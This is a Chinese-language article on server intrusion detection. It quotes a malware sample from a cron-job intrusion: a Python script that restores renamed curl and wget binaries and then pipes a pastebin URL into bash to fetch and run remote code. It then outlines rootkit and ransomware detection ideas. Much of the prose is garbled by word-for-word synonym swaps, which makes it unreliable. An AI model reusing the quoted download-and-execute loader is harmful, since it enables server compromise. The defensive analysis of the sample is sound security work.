态势感知——服务器安全策略探索

我们先看一个入侵案例，以下剧本是用户放到按时使命中的颠末base64加密的剧本，通过替代curl、wget实现历程收集通信潜匿的目标。

import os 
import os.path 
 
def GetDeps(): 
 
   if os.path.isfile('/usr/bin/url'): 
        os.system("mv /usr/bin/url /usr/bin/curl") 
        os.system("chmod 777 /usr/bin/curl") 
        os.system("chmod +x /usr/bin/curl") 
 
    if os.path.isfile('/usr/bin/get'): 
        os.system("mv /usr/bin/get /usr/bin/wget") 
        os.system("chmod 777 /usr/bin/wget") 
        os.system("chmod +x /usr/bin/wget") 
 
    if not os.path.isfile('/usr/bin/wget'): 
        os.system("yum clean all") 
        os.system("yum -y install wget") 
        os.system("apt-get update") 
        os.system("apt-get -y install wget") 
 
    if not os.path.isfile('/usr/bin/curl'): 
        os.system("yum clean all") 
        os.system("yum -y install curl") 
        os.system("apt-get update") 
        os.system("apt-get -y install wget") 
 
if os.getuid()==0: 
    GetDeps() 
os.system("(curl -fsSL https://pastebin.com/raw/JuBCmASZ||wget -q -O- https://pastebin.com/raw/JuBCmASZ)|bash%7Cbash)") 

因为存在我们安装的处事器早年中过rootkit措施的环境。

检测流程

1、必要从长途下载wgetcurlpslsnetstatss等收集和文件检测器材

2、与当地对应的文件做比拟检测找到diff。

3、假如存在Diff，证明存在rootkit的恶意举动，告警。

• 打单软件

检测思绪：

1、上传文件建设基本数据信息、上传历程快照信息。

2、统计平常文件建设数据，配置动态基本数据基线。

3、假如单台处事器建设量超出平常2倍以上，必要把对应的文件上传到云查杀说明，假如发明打单软件病毒标签告警。

0x03、总结

处事器安详检测是一项很是繁琐，而且非凡环境较量多的事变，必要这些检测法则和本领自动化成威胁模子。同时，人工threat huning功效也要不绝插手，形成正向反馈，良性轮回。

（编辑：湖南网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!